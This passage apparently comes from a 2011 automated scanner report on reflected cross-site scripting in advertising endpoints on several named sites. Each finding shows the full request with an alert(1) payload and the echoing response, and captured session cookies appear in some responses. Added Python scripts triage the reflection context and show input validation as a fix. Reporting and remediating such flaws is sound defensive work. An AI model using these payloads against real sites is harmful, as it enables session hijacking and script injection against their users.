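    bad = good + '85448<script>alert(1)</script>62018abb6b0'   # payload from finding 1.26
    for cb in (good, bad):
        status, _, body = jsonp_response(cb, SAMPLE_PROFILE)
        print(status, body[:80])
```

Run it as a script and the legitimate callback produces the wrapped profile while the scanner's payload gets a 400 with none of its characters in the body. The nosniff header matters even with the allow-list in place: it removes the content-sniffing path that is the only way a reflected tag in an application/json body could ever reach an HTML parser.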

1.27. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the response as plain text. The payload 5c4c2<script>alert(1)</script>6caff385852 was submitted in the api_key parameter. This input was echoed unmodified in the 403 error body ("Unknown API key: (...)"). That body is served as Content-Type: text/plain, so a browser honouring the declared type displays the tags rather than executing them; the finding is exploitable only where the client sniffs the response as HTML. Independently of XSS, an error message should not echo the rejected credential back to the caller.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback&api_key=vuy5aqx2hg8yv997yw9e5jr45c4c2<script>alert(1)</script>6caff385852 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KX2vDEYkjj68aj5XcunNcMDa7Re6IGD4lLWOSE2iimqa3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtR5QpvePKBw6ArykBishtoVkEVUJBxdqAyD3lFIcLMteW4iiqSbERYipuWHxYXQtZCS6EipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 15 Aug 2011 18:45:57 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (vuy5aqx2hg8yv997yw9e5jr45c4c2<script>alert(1)</script>6caff385852)
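A re-check script for findings 1.23 to 1.27 (and usable on the rest of this report), added here as an example rather than part of the scanner output. Given a captured response and the marker string, it works out the syntactic context the reflection landed in and whether the declared Content-Type lets a browser parse the body as HTML on direct navigation, which is what separates the text/html findings from the text/plain and application/json ones above. The sample captures embedded below are shortened, constructed copies of the responses in this report; the context names are this example's own.

```python
# Constructed, shortened copies of three responses from this report, keyed by
# finding number. Bodies are cut down to the part around the reflection.
SAMPLES = {
    '1.24': {
        'headers': {'Content-Type': 'text/plain'},
        'payload': '5c8ab--><script>alert(1)</script>09947fcc484',
        'body': ('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">\n'
                 '<html>\n<body>\n<!-- java.lang.NumberFormatException: For input '
                 'string: "15084515c8ab--><script>alert(1)</script>09947fcc484" -->\n'),
    },
    '1.26': {
        'headers': {'Content-Type': 'application/json'},
        'payload': '85448<script>alert(1)</script>62018abb6b0',
        'body': 'cnnad_bizo_load_ad_callback85448<script>alert(1)</script>62018abb6b0({"usage":1});',
    },
    '1.30': {
        'headers': {'Content-Type': 'application/x-javascript'},
        'payload': "9d11f';alert(1)//c15b8b043d6",
        'body': ("// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.\n"
                 "var zzD=window.document;\nif(typeof zzuid=='undefined'){\n"
                 "var zzuid='unknown';}\nvar zzSection=0;var zzPat=',9d11f';alert(1)"
                 "//c15b8b043d6';var zzCustom='';var zzTitle='';\n"),
    },
}


def _open_js_quote(script):
    """Scan JavaScript source and return the quote character of a string
    literal still open at the end, or None. Understands backslash escapes
    and // and /* */ comments; regex and template literals are not modelled."""
    quote = None
    i = 0
    while i < len(script):
        c = script[i]
        if quote:
            if c == '\\':
                i += 1                      # skip the escaped character
            elif c == quote:
                quote = None
        elif c in ('"', "'"):
            quote = c
        elif script.startswith('//', i):
            nl = script.find('\n', i)
            if nl < 0:
                break
            i = nl
        elif script.startswith('/*', i):
            end = script.find('*/', i + 2)
            if end < 0:
                break
            i = end + 1
        i += 1
    return quote


def reflection_context(body, payload, content_type='text/html'):
    """Where does `payload` first land in `body`?

    Returns one of 'html_comment', 'html_attribute', 'html_text',
    'js_string_single', 'js_string_double', 'js_code', or None when the
    marker is absent or came back altered (i.e. was encoded on the way out).
    """
    idx = body.find(payload)
    if idx < 0:
        return None
    before = body[:idx]
    mime = content_type.split(';')[0].strip().lower()
    if mime.endswith('javascript'):
        script = before                     # the whole body is script
    else:
        if before.rfind('<!--') > before.rfind('-->'):
            return 'html_comment'
        low = before.lower()
        open_tag = low.rfind('<script')
        if open_tag > low.rfind('</script'):
            tag_end = before.find('>', open_tag)
            if tag_end < 0:
                return 'html_attribute'     # inside the <script ...> tag itself
            script = before[tag_end + 1:]
        elif before.rfind('<') > before.rfind('>'):
            return 'html_attribute'
        else:
            return 'html_text'
    quote = _open_js_quote(script)
    return {"'": 'js_string_single', '"': 'js_string_double'}.get(quote, 'js_code')


def parsed_as_html(headers):
    """True if a browser navigating straight to the URL parses the body as
    HTML. Declared text/plain, application/json or *javascript types are
    shown as text (script types only execute when some page includes the
    URL via <script src>). A missing Content-Type invites sniffing unless
    X-Content-Type-Options: nosniff is present."""
    h = {k.lower(): v for k, v in headers.items()}
    mime = h.get('content-type', '').split(';')[0].strip().lower()
    if mime in ('text/html', 'application/xhtml+xml'):
        return True
    return mime == '' and h.get('x-content-type-options', '').lower() != 'nosniff'


def triage(sample):
    """Combine both checks for one captured response."""
    ctype = sample['headers'].get('Content-Type', '')
    return {
        'context': reflection_context(sample['body'], sample['payload'], ctype),
        'parsed_as_html': parsed_as_html(sample['headers']),
    }


if __name__ == '__main__':
    for finding, sample in SAMPLES.items():
        print(finding, triage(sample))
```

Running the script over the three embedded samples reports the comment context for 1.24, a text context for the JSONP body of 1.26 and a single-quoted JavaScript string for 1.30, with parsed_as_html False for all three: each reflection is real, but none of these three bodies is rendered as HTML by a browser that respects the declared type, which is the caveat to attach before grading the finding.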

1.28. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://banners.adultfriendfinder.com
Path:   /go/page/iframe_cm_26358

Issue detail

The value of REST URL parameter 3 (the third path segment, iframe_cm_26358) is copied into the HTML document as plain text between tags. The payload 5f7ac<img%20src%3da%20onerror%3dalert(1)>68796daa3dc was submitted in the REST URL parameter 3. This input was echoed as 5f7ac<img src=a onerror=alert(1)>68796daa3dc in the application's response, i.e. URL-decoded but not HTML-encoded, inside a text node of a text/html page.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /go/page/iframe_cm_263585f7ac<img%20src%3da%20onerror%3dalert(1)>68796daa3dc?dcb=sexfinder.com&pid=p1935206.submad_70975_1_s5232&madirect=http://medleyads.com/spot/c/1313434697/1376046894/10664.html HTTP/1.1
Host: banners.adultfriendfinder.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:08:05 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,9kkT3FAgrg/ltHNWFQ_6tJzHGR0dtCKllPHqgsvcj13fvkskx4bbQm6F66eDPa410PU86fLd7lbFcIw26rWp9pjKfhvAZsbS2AIta07UzdIhBLLebh/pcIK3wr/3oE8b39ayFOf7NFF/h_LYDH4RXZke/zyv/4Sk5cy5VpAJ9mHO3/Utt0cMZnVylsjqLZD3; path=/; domain=.adultfriendfinder.com
Set-Cookie: v_hash=_english_13029; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:08:05 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:08:05 GMT
Set-Cookie: ffadult_tr=r,Gf4cx0MBS68uu5LLsiToqHGKORZFXs5PWa_XSBvVwwhoujBG4d6PjPbjfuqQG_Kk; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:08:05 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:08:05 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:08:05 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki55-32.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 4231
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<!-- v.live-curr -->


[nopath::iframe_cm_263585f7ac<img src=a onerror=alert(1)>68796daa3dc:ffadult:english]
<script type="text/javascript">
...[SNIP]...

1.29. http://banners.bookofsex.com/go/page/iframe_cm_26400 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://banners.bookofsex.com
Path:   /go/page/iframe_cm_26400

Issue detail

The value of REST URL parameter 3 (the third path segment, iframe_cm_26400) is copied into the HTML document as plain text between tags. The payload 8f30f<img%20src%3da%20onerror%3dalert(1)>f85e16a239f was submitted in the REST URL parameter 3. This input was echoed as 8f30f<img src=a onerror=alert(1)>f85e16a239f in the application's response, i.e. URL-decoded but not HTML-encoded, inside a text node of a text/html page.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /go/page/iframe_cm_264008f30f<img%20src%3da%20onerror%3dalert(1)>f85e16a239f?pid=p1934513.submad_24810_1_s5232&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html HTTP/1.1
Host: banners.bookofsex.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:42 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,MmN0w/pHhOtiUhvu2cqOAhPXI3vAl_sKu1jXDJ5hPRln66gvkW4C1ZrfoWzNxGUwuhStvC1krqYaPtlWQwqW27JPCSNo7T4vM_5D3236uF1F3gJc3mNXRQA6jDGKtYo88kh9FEes39vXYaMvz5CnXAQXYVCTRE5Wj6idOSIRLdPO3/Utt0cMZnVylsjqLZD3; path=/; domain=.banners.bookofsex.com
Set-Cookie: v_hash=_english_29272; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:42 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:42 GMT
Set-Cookie: ffadult_tr=r,leHvy3H7731NgBzxtr9HhpO_Jtw3voEigBFMEc1y52houjBG4d6PjPbjfuqQG_Kk; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:42 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:42 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:42 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki50-16.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 3530
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<!-- v.live-curr -->


[nopath::iframe_cm_264008f30f<img src=a onerror=alert(1)>f85e16a239f:ffadult:english]
<script language="javascript" type="text/javascript">
...[SNIP]...
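For findings 1.23 to 1.25 and 1.28 to 1.29 the root cause is the same: a value the server expects to be an integer or a fixed page id is echoed raw when it fails to parse, once inside an HTML comment and once as a text node. The Python below is an added example (not adsonar's or friendfinder's code) of validating first and never writing the rejected value back; the integer and page-id patterns, the BadParam type and the error page wording are assumptions drawn from the captured values.

```python
import html
import re

# Allow-lists inferred from the captured requests (assumptions, not the
# vendors' rules): adsonar's placementId/pid/ps are decimal integers, which
# the NumberFormatException in the responses confirms the server expects;
# the friendfinder banner's third path segment looks like iframe_cm_<digits>.
_INT_RE = re.compile(r'^-?[0-9]{1,12}$')
_PAGE_ID_RE = re.compile(r'^iframe_cm_[0-9]{1,10}$')


class BadParam(ValueError):
    """Carries only the parameter *name*; the offending value is never stored,
    so it cannot leak into an error page or a log line by accident."""
    def __init__(self, name):
        super().__init__(f'invalid value for parameter {name}')
        self.name = name


def parse_int_param(params, name):
    raw = params.get(name)
    if raw is None or not _INT_RE.match(raw):
        raise BadParam(name)
    return int(raw)


def is_valid_page_id(segment):
    return isinstance(segment, str) and _PAGE_ID_RE.match(segment) is not None


def html_comment_safe(text):
    """Make text safe inside <!-- ... -->: entity-encode &, <, > and quotes,
    then split every '--' so neither '-->' nor '--!>' can be assembled.
    Browsers do not entity-decode comment content, so the encoded form is
    exactly what the parser sees."""
    return html.escape(text, quote=True).replace('--', '-&#45;')


def error_page(name):
    """A 400 page that mentions the parameter name only. The comment mirrors
    what getAds.jsp emits, minus the raw input."""
    body = ('<!DOCTYPE html>\n<html><body>\n'
            f'<!-- {html_comment_safe("rejected parameter " + name)} -->\n'
            f'<p>Invalid value for {html.escape(name)}.</p>\n</body></html>\n')
    headers = {'Content-Type': 'text/html; charset=utf-8',
               'X-Content-Type-Options': 'nosniff'}
    return 400, headers, body


def get_ads(params):
    """Validate-first version of the getAds.jsp parameter handling."""
    try:
        placement = parse_int_param(params, 'placementId')
        pid = parse_int_param(params, 'pid')
        ps = parse_int_param(params, 'ps')
    except BadParam as exc:
        return error_page(exc.name)
    body = ('<!DOCTYPE html>\n<html><body>\n'
            f'<!-- placement {placement} pid {pid} ps {ps} -->\n'
            '</body></html>\n')
    return 200, {'Content-Type': 'text/html; charset=utf-8',
                 'X-Content-Type-Options': 'nosniff'}, body


def banner_marker(page_id):
    """The "[nopath::<page>:ffadult:english]" text node from the friendfinder
    responses, rendered only for an allow-listed id and entity-encoded anyway."""
    if not is_valid_page_id(page_id):
        raise BadParam('page')
    return f'[nopath::{html.escape(page_id)}:ffadult:english]'


if __name__ == '__main__':
    # Payload from finding 1.24, as captured.
    attack = {'placementId': '15084515c8ab--><script>alert(1)</script>09947fcc484',
              'pid': '754773', 'ps': '-1'}
    print(get_ads(attack)[2])
    print(banner_marker('iframe_cm_26358'))
```

The ordering is the point: parsing happens before any output is assembled, the exception type carries no user data, and the encoder is only a second line of defence for values that legitimately belong in a comment. Run with the 1.24 payload the script prints a 400 page whose single --> is the one closing the server's own comment.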

1.30. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d11f'%3balert(1)//c15b8b043d6 was submitted in the $ parameter. This input was echoed as 9d11f';alert(1)//c15b8b043d6 in the application's response. The value is spliced into two string literals in the generated script, the single-quoted zzPat and the double-quoted zzStr, so either quote character closes a string (hence the paired finding 1.31), and it is also written into the FFpb cookie via Set-Cookie. Because fm.js is served as application/x-javascript, the injected code runs with the origin of whichever page includes the script through a script tag whose parameters an attacker can influence; navigating to the .js URL directly only displays it.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fm.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=9d11f'%3balert(1)//c15b8b043d6&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=187:9d11f';alert(1)//c15b8b043d6;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6b-8952-4aa4e37ca04c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 954
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',9d11f';alert(1)//c15b8b043d6';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,9d11f';alert(1)//c15b8b043d6;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasA
...[SNIP]...

1.31. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 670b3"%3balert(1)//f5912b9b2f0 was submitted in the $ parameter. This input was echoed as 670b3";alert(1)//f5912b9b2f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fm.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=670b3"%3balert(1)//f5912b9b2f0&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=187:670b3";alert(1)//f5912b9b2f0;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6b-8952-4aa4e37ca04c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 954
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',670b3";alert(1)//f5912b9b2f0';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,670b3";alert(1)//f5912b9b2f0;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = ne
...[SNIP]...

1.32. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d87fc'%3balert(1)//ee4a5933799 was submitted in the q parameter. This input was echoed as d87fc';alert(1)//ee4a5933799 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fm.js?c=234&a=0&f=&n=187&r=13&d=94&q=d87fc'%3balert(1)//ee4a5933799&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Tue, 14 Aug 2012 18:55:44 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6b-8952-4aa4e37ca04c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 960
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='d87fc';alert(1)//ee4a5933799';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=d87fc';alert(1)//ee4a5933799;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasAd
...[SNIP]...

1.33. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff9f3"%3balert(1)//2cfb0f5522a was submitted in the q parameter. This input was echoed as ff9f3";alert(1)//2cfb0f5522a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fm.js?c=234&a=0&f=&n=187&r=13&d=94&q=ff9f3"%3balert(1)//2cfb0f5522a&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6b-8952-4aa4e37ca04c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 951
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='ff9f3";alert(1)//2cfb0f5522a';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=ff9f3";alert(1)//2cfb0f5522a;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = ne
...[SNIP]...

1.34. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee14d"%3balert(1)//df0d75c743f was submitted in the $ parameter. This input was echoed as ee14d";alert(1)//df0d75c743f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

